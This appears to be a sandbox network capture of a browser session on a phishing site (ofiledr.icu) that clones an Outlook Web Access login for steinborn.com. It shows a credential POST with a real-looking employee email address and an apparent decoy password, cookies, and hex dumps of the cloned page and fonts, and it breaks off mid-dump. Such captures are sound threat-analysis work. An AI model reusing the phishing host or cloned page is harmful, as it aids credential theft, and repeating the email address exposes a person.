2025-01-13 14:28:34 UTC	8000	IN	Data Raw: 9c fe 70 fe bd fe a1 fe 68 05 32 fe ba fe f7 fe f7 fe bd 01 34 01 15 01 1c 01 36 00 00 02 00 bc 00 00 04 29 05 9a 00 0a 00 12 00 85 40 23 77 06 01 35 0f 01 00 91 0c 0c 03 02 12 0b 91 03 03 07 08 0d 06 4d 07 08 0c 06 4d 07 08 0b 06 4d 07 7d 10 b8 ff e8 b3 0d 06 4d 10 b8 ff e8 40 1e 0c 06 4d 10 10 0b 06 4d 10 10 14 0c 01 06 0d 06 4d 01 06 0c 06 4d 01 06 0b 06 4d 01 7e 02 b8 ff f8 b3 0d 06 4d 02 b8 ff f4 40 09 0c 06 4d 02 04 0b 06 4d 02 2f 2b 2b 2b e9 2b 2b 2b 32 12 39 2f 2b 2b 2b e9 2b 2b 2b 00 3f ed 3f 12 39 2f ed 31 30 5d 5d 01 11 23 11 21 32 16 15 14 00 23 03 11 33 32 36 35 10 21 01 64 a8 01 8a e6 fd fe e7 ef bd b0 ae b7 fe b0 02 1e fd e2 05 9a e0 cc cc fe fc 02 e4 fd b4 9f 91 01 1c 00 00 02 00 5e ff 3f 06 25 05 b2 00 14 00 24 00 2c 40 15 13 10 04 11 0c Data Ascii: ph246)@#w5MMM}M@MMMMM~M@MM/++++++29/++++++??9/10]]#!2#3265!d^?%$,@
2025-01-13 14:28:34 UTC	8000	IN	Data Raw: fc 25 37 27 35 03 04 00 00 01 00 1a 00 00 03 92 04 00 00 13 00 e0 40 13 7b 13 01 73 0e 01 79 0c 01 74 0a 01 7b 03 01 75 01 01 13 b8 ff f8 40 09 0b 06 4d 0e 08 0b 06 4d 0c b8 ff f8 40 09 0b 06 4d 0a 08 0b 06 4d 03 b8 ff f8 40 09 0b 06 4d 01 08 0b 06 4d 0d b8 ff f0 b3 0c 06 4d 0c b8 ff f0 b3 0c 06 4d 0b b8 ff f0 40 13 0c 06 4d 02 10 0c 06 4d 01 10 0c 06 4d 00 10 0c 06 4d 01 b8 ff f0 b3 0b 00 4d 13 b8 ff f0 40 11 0b 0d 01 4c 0e 10 0b 0d 01 4c 0a 10 0b 0d 01 4c 03 b8 ff f0 40 0a 0b 0d 01 4c 11 18 0b 01 4d 06 b8 ff e8 40 15 0b 01 4d 03 06 11 13 04 0b 0d 0f 0b 00 02 0d 0b 02 02 15 0b 15 b8 ff c0 b2 0c 00 4d 2b 2f 11 33 2f 11 33 11 33 00 2f 3f 12 17 39 2b 2b 31 30 01 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 5d 5d 5d 5d 5d 5d 09 02 23 03 26 27 23 06 07 Data Ascii: %7'5@{syt{u@MM@MM@MMMM@MMMMM@LLL@LM@MM+/3/33/?9++10+++++++++++++++++]]]]]]#&'#
2025-01-13 14:28:34 UTC	8000	IN	Data Raw: fe 01 ae 85 00 01 00 5e fe ea 03 b8 05 9a 00 1c 00 71 40 12 79 13 01 79 11 01 77 09 01 77 03 01 0a 30 0c 00 4d 04 b8 ff f0 40 30 0c 00 4d 0f 06 01 06 06 04 08 05 04 03 09 13 16 17 09 04 12 10 14 30 14 40 14 03 14 14 12 12 0d 1c 0d 08 05 13 95 16 16 1d 02 95 1a 03 10 95 0b 00 2f ed 3f ed 12 39 2f ed 39 39 01 2f 2f 12 39 11 33 2f 5d 11 17 33 11 17 33 11 33 2f 5d 31 30 2b 00 2b 01 5d 5d 5d 5d 01 26 23 22 07 07 33 15 23 03 02 21 22 27 35 16 33 32 13 13 23 35 33 37 36 36 33 32 17 03 b8 30 3c 92 18 1f a6 bb 5a 3a fe de 1f 3b 24 32 96 28 5b 67 7c 1c 11 af 86 40 34 04 f2 1c a0 d0 8a fd 78 fe 5e 10 8f 15 01 24 02 7c 8a db 83 9e 13 00 02 00 5c 00 c8 03 b4 03 70 00 05 00 0b 00 2b 40 15 06 0a 00 04 00 00 04 f0 05 02 08 80 0a 0a 06 f0 0b 0f 08 01 08 2f 5d 33 f1 c0 2f Data Ascii: ^q@yyww0M@0M0@/?9/99//93/]333/]10++]]]]&#"3#!"'532#53766320<Z:;$2([g\|@4x^$\|\p+@/]3/
2025-01-13 14:28:34 UTC	8000	IN	Data Raw: 0b 08 08 07 08 09 0a 05 06 06 0e 0e 0e 06 05 08 06 06 05 00 10 13 0a 00 02 04 05 06 09 09 0d 0d 04 05 05 07 0b 03 06 03 06 09 09 09 09 09 09 09 09 09 09 03 03 0b 0b 0b 07 0f 0a 09 0a 0b 08 08 0b 0b 04 06 09 08 0e 0c 0c 09 0c 0a 09 08 0b 0a 0f 09 09 09 05 06 05 0b 07 04 08 09 07 09 08 05 09 09 04 04 08 04 0e 09 09 09 09 06 07 05 09 08 0c 07 08 07 05 04 05 0b 0a 0a 0a 08 0c 0c 0b 08 08 08 08 08 08 07 08 08 08 08 04 04 04 04 09 09 09 09 09 09 09 09 09 09 06 06 09 09 07 07 07 09 06 0e 0e 0c 05 07 0e 0c 0b 09 09 06 07 0d 09 07 04 05 0b 09 08 08 0c 0a 0a 0c 0f 0f 08 10 06 06 04 04 0b 08 09 03 09 05 05 06 03 04 06 13 0a 08 0a 08 08 04 04 04 04 0c 0c 0c 0b 0b 0b 04 06 05 04 03 06 09 07 09 07 04 0b 09 09 08 09 09 0b 06 06 06 0f 0f 0f 07 06 09 06 06 06 00 11 15 0b Data Ascii:
2025-01-13 14:28:34 UTC	8000	IN	Data Raw: 00 b6 ff 08 00 3c 00 b8 ff 62 00 3c 00 ba ff 62 00 3c 00 c1 ff d3 00 3c 00 c2 ff d3 00 3c 00 c3 ff d3 00 3c 00 cd ff e5 00 3c 00 ce ff 7b 00 3d 00 2d 00 52 00 3d 00 37 00 27 00 3d 00 5c ff cb 00 3d 00 77 00 46 00 3d 00 9f 00 27 00 3d 00 ad ff be 00 3d 00 b2 00 52 00 3d 00 d5 ff cb 00 3e 00 4d 00 e9 00 45 00 44 ff e5 00 45 00 49 ff f6 00 45 00 5b ff e7 00 45 00 69 ff e5 00 45 00 6a ff e5 00 45 00 6b ff e5 00 45 00 6c ff e5 00 45 00 6d ff e5 00 45 00 6e ff e5 00 45 00 97 ff e5 00 46 00 2d 00 46 00 46 00 37 ff 9a 00 46 00 3c ff b4 00 46 00 d4 ff b4 00 48 00 05 ff 98 00 48 00 0a ff 98 00 49 00 0c 00 8d 00 49 00 0f ff 7f 00 49 00 10 ff 9a 00 49 00 11 ff 7f 00 49 00 1d 00 52 00 49 00 1e 00 52 00 49 00 22 00 42 00 49 00 40 00 8d 00 49 00 45 00 12 00 49 00 4b 00 Data Ascii: <b<b<<<<<{=-R=7'=\=wF='==R=>MEDEIE[EiEjEkElEmEnEF-FF7F<FHHIIIIIRIRI"BI@IEIK
2025-01-13 14:28:34 UTC	840	IN	Data Raw: 2b 0f 22 23 0e 24 23 0f 1e 1f 0e 20 1f 0f 00 bf 01 31 00 10 01 31 00 20 01 31 00 03 00 00 01 30 40 80 01 70 2a e0 2a 02 00 3c 01 10 24 40 24 70 24 a0 24 04 0f 10 11 0c 09 0a 0b 0c 06 07 08 0c 03 04 05 0c 00 01 02 0c 26 06 1c 1f 06 03 18 1f 0f 03 3f 03 df 03 03 9f 00 df 00 02 0f 17 1f 17 2f 17 03 0f 14 1f 14 2f 14 03 1b 01 1d 0d 18 07 1a 0d 15 10 17 0d 12 04 14 0d 2f 1b 01 2c 3c 2a 3c 28 3c 26 3c 24 3c 22 3c 20 3c 1e 3c 1b 3c 18 3c 15 3c 12 3c 0f 3c 09 3c 06 3c 03 3c 00 3c 50 33 54 01 b0 12 4b 00 4b 54 42 b0 13 01 4b 00 4b 53 42 b0 33 2b 4b b8 03 20 52 b0 32 2b 4b b0 09 50 5b 58 b1 01 01 8e 59 b0 33 2b b0 02 88 b8 01 00 54 b0 04 88 b8 02 00 54 b0 12 43 5a 5b 58 b8 01 19 b1 01 01 8e 85 1b b9 00 01 01 00 b0 4b 60 85 8d 59 2b 2b 1d b0 64 4b 53 58 b0 80 1d 59 Data Ascii: +"#$# 11 10@p*<$@$p$$&?///,<<(<&<$<"< <<<<<<<<<<<P3TKKTBKKSB3+K R2+KP[XY3+TTCZ[XK`Y++dKSXY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.16	49733	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:45 UTC	1052	OUT	POST /auth/auth.php HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive Content-Length: 90 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://www.ofiledr.icu Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cookieTest=1; logondata=acc=0&lgn=bjparish@steinborn.com; PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5; PrivateComputer=true; PBack=0
2025-01-13 14:28:45 UTC	90	OUT	Data Raw: 75 73 65 72 6e 61 6d 65 3d 62 6a 70 61 72 69 73 68 25 34 30 73 74 65 69 6e 62 6f 72 6e 2e 63 6f 6d 26 70 61 73 73 77 6f 72 64 3d 46 75 63 6b 41 70 68 69 73 68 65 72 26 70 61 73 73 77 6f 72 64 54 65 78 74 3d 26 69 73 55 74 66 38 3d 31 26 73 65 6e 64 3d 73 75 62 6d 69 74 Data Ascii: username=bjparish%40steinborn.com&password=FuckAphisher&passwordText=&isUtf8=1&send=submit
2025-01-13 14:28:51 UTC	414	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 14:28:46 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.16	49732	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:51 UTC	1014	OUT	GET /auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cookieTest=1; logondata=acc=0&lgn=bjparish@steinborn.com; PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5; PrivateComputer=true; PBack=0
2025-01-13 14:28:53 UTC	335	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:52 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-13 14:28:53 UTC	7857	IN	Data Raw: 32 30 30 30 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 31 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 4f 77 61 50 61 67 65 20 3d 20 41 53 50 2e 61 75 74 68 5f 6c 6f 67 6f 6e 5f 61 73 70 78 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 7b 35 37 41 31 31 38 43 36 2d 32 44 41 39 2d 34 31 39 64 2d 42 45 39 41 2d 46 39 32 42 30 46 39 41 34 31 38 42 7d 20 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c Data Ascii: 2000<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">... Copyright (c) 2011 Microsoft Corporation. All rights reserved. -->... OwaPage = ASP.auth_logon_aspx -->... {57A118C6-2DA9-419d-BE9A-F92B0F9A418B} --><html><head><
2025-01-13 14:28:53 UTC	341	IN	Data Raw: 65 72 0d 0a 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 23 30 30 37 32 43 36 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 77 66 5f 73 65 67 6f 65 2d 75 69 5f 6e 6f 72 6d 61 6c 27 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 27 53 65 67 6f 65 20 57 50 27 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 74 77 69 64 65 20 2e 73 69 67 6e 49 6e 45 6e 74 65 72 0d 0a 7b 0d 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 37 70 78 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 39 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 74 6e 61 72 72 6f 77 20 2e 73 69 67 6e 49 6e 45 6e 74 65 72 20 0d 0a 7b 0d 0a 09 6d 61 72 67 69 6e 2d Data Ascii: er{font-size:22px;color:#0072C6;font-family:'wf_segoe-ui_normal', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;margin-top:20px;}.twide .signInEnter{margin-top:17px;font-size: 29px;}.tnarrow .signInEnter {margin-
2025-01-13 14:28:53 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:53 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 69 67 6e 69 6e 62 75 74 74 6f 6e 20 0d 0a 7b 0d 0a 20 20 20 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 0d 0a 7d 0d 0a 0d 0a 2e 6d 6f 75 73 65 20 2e 73 69 67 6e 69 6e 62 75 74 74 6f 6e 0d 0a 7b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 20 38 70 78 20 35 70 78 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 72 74 6c 20 2e 6d 6f 75 73 65 20 2e 73 69 67 6e 69 6e 62 75 74 74 6f 6e 0d 0a 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2d 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 74 6e 61 72 72 6f 77 20 2e 73 69 67 6e 69 6e 62 75 74 74 6f 6e 20 0d 0a 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 Data Ascii: 2000igninbutton { cursor:pointer; display:inline}.mouse .signinbutton{ padding: 0px 8px 5px 8px; margin-left: -8px;}.rtl .mouse .signinbutton{ margin-right: -8px;}.tnarrow .signinbutton {position: re
2025-01-13 14:28:53 UTC	6	IN	Data Raw: 20 20 20 20 20 20 Data Ascii:
2025-01-13 14:28:53 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:53 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 20 20 20 20 6f 20 3d 20 6f 46 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 57 65 27 72 65 20 72 65 70 6c 61 63 69 6e 67 20 73 6f 6d 65 74 68 69 6e 67 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 63 75 72 72 65 6e 74 20 66 72 61 6d 65 2c 20 20 77 65 27 6c 6c 20 6a 75 73 74 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 6c 6f 67 20 62 61 63 6b 20 69 6e 20 74 6f 20 74 68 65 20 64 65 66 61 75 6c 74 20 73 74 61 72 74 20 70 61 67 65 20 69 66 20 74 68 65 20 66 72 61 6d 65 20 64 6f 65 73 6e 27 74 20 70 72 6f 76 69 64 65 20 61 20 75 72 6c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 20 66 6f 72 20 72 65 6c 6f 67 6f 6e 2e 20 54 68 65 20 66 72 61 6d 65 20 73 68 6f 75 6c 64 20 70 72 6f 76 69 64 65 20 61 20 67 6c 6f 62 61 Data Ascii: 2000 o = oF; // We're replacing something other than the current frame, we'll just // log back in to the default start page if the frame doesn't provide a url // for relogon. The frame should provide a globa
2025-01-13 14:28:53 UTC	6	IN	Data Raw: 20 6e 75 6c 6c 20 Data Ascii: null
2025-01-13 14:28:53 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:53 UTC	8192	IN	Data Raw: 31 65 64 38 0d 0a 21 3d 20 6d 69 6d 65 4c 6f 67 6f 66 66 45 32 6b 33 29 20 26 26 20 49 73 4d 69 6d 65 43 74 6c 49 6e 73 74 28 22 4d 69 6d 65 42 68 76 72 2e 4d 69 6d 65 43 74 6c 56 65 72 22 29 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6d 65 4c 6f 67 6f 66 66 45 32 6b 33 2e 4c 6f 67 6f 66 66 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 28 74 79 70 65 6f 66 20 28 6d 69 6d 65 4c 6f 67 6f 66 66 45 32 6b 37 53 50 31 29 20 21 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 6e 75 6c 6c 20 21 3d 20 6d 69 6d 65 4c 6f 67 6f 66 66 45 32 6b 37 53 50 31 29 20 26 26 20 49 73 4d 69 6d 65 43 74 6c 49 6e 73 74 28 22 4f 77 61 53 4d 69 6d 65 2e 4d 69 6d 65 43 74 6c 56 65 72 22 29 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6d 65 4c 6f 67 6f 66 Data Ascii: 1ed8!= mimeLogoffE2k3) && IsMimeCtlInst("MimeBhvr.MimeCtlVer")) mimeLogoffE2k3.Logoff(); if ((typeof (mimeLogoffE2k7SP1) != "undefined" && null != mimeLogoffE2k7SP1) && IsMimeCtlInst("OwaSMime.MimeCtlVer")) mimeLogof

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.16	49734	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:54 UTC	798	OUT	GET /auth/resources/segoeui-semilight.ttf HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.ofiledr.icu sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&reason=2&url=http%3A%2F%2Fsteinborn.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cookieTest=1; logondata=acc=0&lgn=bjparish@steinborn.com; PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5; PrivateComputer=true; PBack=0
2025-01-13 14:28:55 UTC	272	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:54 GMT Server: Apache Last-Modified: Sun, 06 Oct 2019 23:17:04 GMT Accept-Ranges: bytes Content-Length: 41560 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Connection: close Content-Type: font/ttf
2025-01-13 14:28:55 UTC	7920	IN	Data Raw: 00 01 00 00 00 10 01 00 00 04 00 00 4f 53 2f 32 4a 23 75 40 00 00 01 0c 00 00 00 60 56 44 4d 58 76 58 7d d3 00 00 01 6c 00 00 05 e0 63 6d 61 70 36 ce 14 f7 00 00 07 4c 00 00 01 c2 63 76 74 20 2a c4 24 1a 00 00 09 10 00 00 02 2c 66 70 67 6d bb 73 a4 75 00 00 0b 3c 00 00 07 e0 67 61 73 70 00 19 00 23 00 00 13 1c 00 00 00 10 67 6c 79 66 cb 87 2d 10 00 00 13 2c 00 00 60 10 68 65 61 64 f7 c6 94 6d 00 00 73 3c 00 00 00 36 68 68 65 61 10 a8 07 16 00 00 73 74 00 00 00 24 68 6d 74 78 92 86 5c 10 00 00 73 98 00 00 03 90 6b 65 72 6e 8d e9 8b c1 00 00 77 28 00 00 1f c2 6c 6f 63 61 00 2e 14 84 00 00 96 ec 00 00 03 98 6d 61 78 70 02 6d 01 85 00 00 9a 84 00 00 00 20 6e 61 6d 65 8e 5e b7 89 00 00 9a a4 00 00 06 38 70 6f 73 74 ff 51 00 77 00 00 a0 dc 00 00 00 20 70 72 65 Data Ascii: OS/2J#u@`VDMXvX}lcmap6Lcvt *$,fpgmsu<gasp#glyf-,`headms<6hheast$hmtx\skernw(loca.maxpm name^8postQw pre
2025-01-13 14:28:55 UTC	8000	IN	Data Raw: 0d 0e 00 4d 40 0d 00 0e 0f 0e 50 59 0f 06 08 18 00 3f 3f 2b 11 00 33 01 18 2f 1a ed 2f 12 39 2f 31 30 01 0e 05 07 23 36 1a 02 37 21 35 21 03 c4 4d 83 6d 58 45 33 12 87 18 62 88 a9 5d fd 20 03 7e 05 64 8b f8 e6 d8 d6 da 73 9c 01 48 01 4e 01 50 a4 74 00 00 03 00 62 ff e9 03 d9 05 b2 00 25 00 39 00 4d 00 57 40 2d 44 4d 12 3a 4d 08 17 05 08 12 08 12 08 00 1c 4d 30 26 4d 40 00 17 05 3f 35 3f 35 50 59 3f 3f 21 0d 21 2b 50 59 21 19 0d 49 50 59 0d 07 00 3f 2b 00 18 3f 2b 11 12 00 39 18 2f 2b 11 12 00 39 39 01 18 2f 1a ed 2f ed 11 39 39 2f 2f 12 39 39 10 ed 10 ed 31 30 13 34 3e 02 37 26 26 35 34 3e 02 33 32 1e 02 15 14 0e 02 07 1e 03 15 14 0e 02 23 22 2e 02 37 14 1e 02 33 32 3e 02 35 34 2e 02 23 22 0e 02 13 14 1e 02 33 32 3e 02 35 34 2e 02 23 22 0e 02 62 22 44 64 Data Ascii: M@PY??+3//9/10#67!5!MmXE3b] ~dsHNPtb%9MW@-DM:MM0&M@?5?5PY??!!+PY!IPY?+?+9/+99//99//99104>7&&54>32#".732>54.#"32>54.#"b"Dd
2025-01-13 14:28:55 UTC	8000	IN	Data Raw: 2a 18 1e 3b 45 55 38 45 6c 4a 26 41 00 01 00 21 ff eb 02 5d 05 2c 00 14 00 37 40 1b 0b 0f 46 40 08 04 04 00 06 0d 00 0e 06 07 06 48 59 0b 0a 07 0f 02 12 48 59 02 16 00 3f 2b 00 18 3f c4 33 2b 11 00 33 01 18 2f 33 2f 12 39 2f 33 1a ed 32 31 30 25 06 23 22 11 11 23 35 33 11 37 11 21 15 21 11 14 16 33 32 37 02 5d 42 4e f8 b4 b4 80 01 08 fe f8 44 51 3c 37 0c 21 01 1e 02 87 70 01 02 2a fe d4 70 fd 8d 68 5c 24 00 01 00 8f ff e8 03 c3 04 00 00 14 00 2a 40 15 09 46 06 14 46 40 11 00 02 04 12 07 0f 04 0c 48 59 04 16 00 15 00 3f 3f 2b 00 18 3f 33 12 39 01 2f 33 1a ed 2f ed 31 30 21 35 23 06 23 20 11 11 33 11 14 16 33 32 3e 02 35 11 33 11 03 43 04 68 db fe 93 80 83 87 42 6d 4f 2c 80 ae c6 01 be 02 5a fd be b8 b0 33 5d 82 4f 02 49 fc 00 00 00 01 00 10 00 00 03 aa 04 Data Ascii: ;EU8ElJ&A!],7@F@HYHY?+?3+3/3/9/3210%#"#537!!327]BNDQ<7!pph\$*@FF@HY??+?39/3/10!5## 332>53ChBmO,Z3]OI
2025-01-13 14:28:55 UTC	8000	IN	Data Raw: 04 03 29 4c 59 03 13 00 1a 4c 59 00 12 00 3f 2b 00 18 3f 2b 00 18 3f 2b 00 18 3f 2b 11 12 00 39 18 2f 5f 5e 5d 2b 01 18 2f 1a ed 2f 33 12 39 39 2f 2f ed 32 31 30 21 06 06 23 22 26 26 02 35 34 12 36 24 33 32 1e 02 17 21 15 21 11 21 15 21 11 21 15 01 26 23 22 0e 02 15 14 1e 02 33 32 37 04 3b 30 95 68 a0 fc b0 5d 61 b6 01 05 a3 29 58 4e 3b 0d 02 a7 fd cb 02 0c fd f4 02 56 fd 24 8f 7f 7d cc 91 4f 4b 8d c9 7f 7d 9a 05 13 6b c0 01 0a a0 ac 01 17 c6 6c 06 08 08 02 7a fd f2 78 fd df 79 05 1d 1c 5d a5 e5 88 88 e3 a4 5b 20 00 00 03 00 5d ff e8 07 1c 04 18 00 25 00 2e 00 42 00 54 40 2c 00 46 3e 3e 14 26 08 25 47 26 34 47 40 14 29 2f 19 2f 48 59 2e 00 48 59 07 0d 0f 1d 19 2e 2e 0f 1f 19 10 05 39 0f 39 48 59 0a 0f 16 00 3f 33 2b 11 00 33 18 3f 33 12 39 2f 12 39 12 39 Data Ascii: )LYLY?+?+?+?+9/_^]+//399//210!#"&&546$32!!!!!&#"327;0h]a)XN;V$}OK}klzxy][ ]%.BT@,F>>&%G&4G@)//HY.HY..99HY?3+3?39/99
2025-01-13 14:28:55 UTC	8000	IN	Data Raw: 00 2f 00 cf 00 3b 00 2f 00 d4 ff 7f 00 2f 00 d5 ff b4 00 32 00 0f ff a4 00 32 00 11 ff a4 00 32 00 24 ff e5 00 32 00 2d ff f6 00 32 00 37 ff a4 00 32 00 3b ff db 00 32 00 3c ff e7 00 32 00 3d ff cf 00 32 00 62 ff e5 00 32 00 63 ff e5 00 32 00 a0 ff a4 00 32 00 a1 ff e5 00 32 00 a2 ff e5 00 32 00 ae ff f6 00 32 00 b5 ff 4c 00 32 00 b6 ff 98 00 32 00 b8 ff e5 00 32 00 ba ff e5 00 32 00 cf ff cf 00 32 00 d4 ff e7 00 33 00 0f fe ba 00 33 00 11 fe ba 00 33 00 24 ff 62 00 33 00 2a ff f6 00 33 00 2d ff 7f 00 33 00 3a 00 27 00 33 00 3b ff c3 00 33 00 44 ff be 00 33 00 46 ff b4 00 33 00 47 ff b4 00 33 00 48 ff b4 00 33 00 4a ff b4 00 33 00 52 ff b4 00 33 00 54 ff b6 00 33 00 62 ff 62 00 33 00 63 ff 62 00 33 00 69 ff be 00 33 00 6a ff be 00 33 00 6b ff be 00 33 00 Data Ascii: /;//222$2-272;2<2=2b2c22222L22222333$b3*3-3:'3;3D3F3G3H3J3R3T3bb3cb3i3j3k3
2025-01-13 14:28:55 UTC	1640	IN	Data Raw: 00 53 00 65 00 67 00 6f 00 65 00 55 00 49 00 2d 00 53 00 65 00 6d 00 69 00 6c 00 69 00 67 00 68 00 74 00 53 00 65 00 67 00 6f 00 65 00 20 00 69 00 73 00 20 00 61 00 20 00 74 00 72 00 61 00 64 00 65 00 6d 00 61 00 72 00 6b 00 20 00 6f 00 66 00 20 00 74 00 68 00 65 00 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 67 00 72 00 6f 00 75 00 70 00 20 00 6f 00 66 00 20 00 63 00 6f 00 6d 00 70 00 61 00 6e 00 69 00 65 00 73 00 2e 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 77 00 77 00 77 00 2e 00 6d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 63 00 6f 00 6d 00 2f 00 74 00 79 00 70 00 6f 00 67 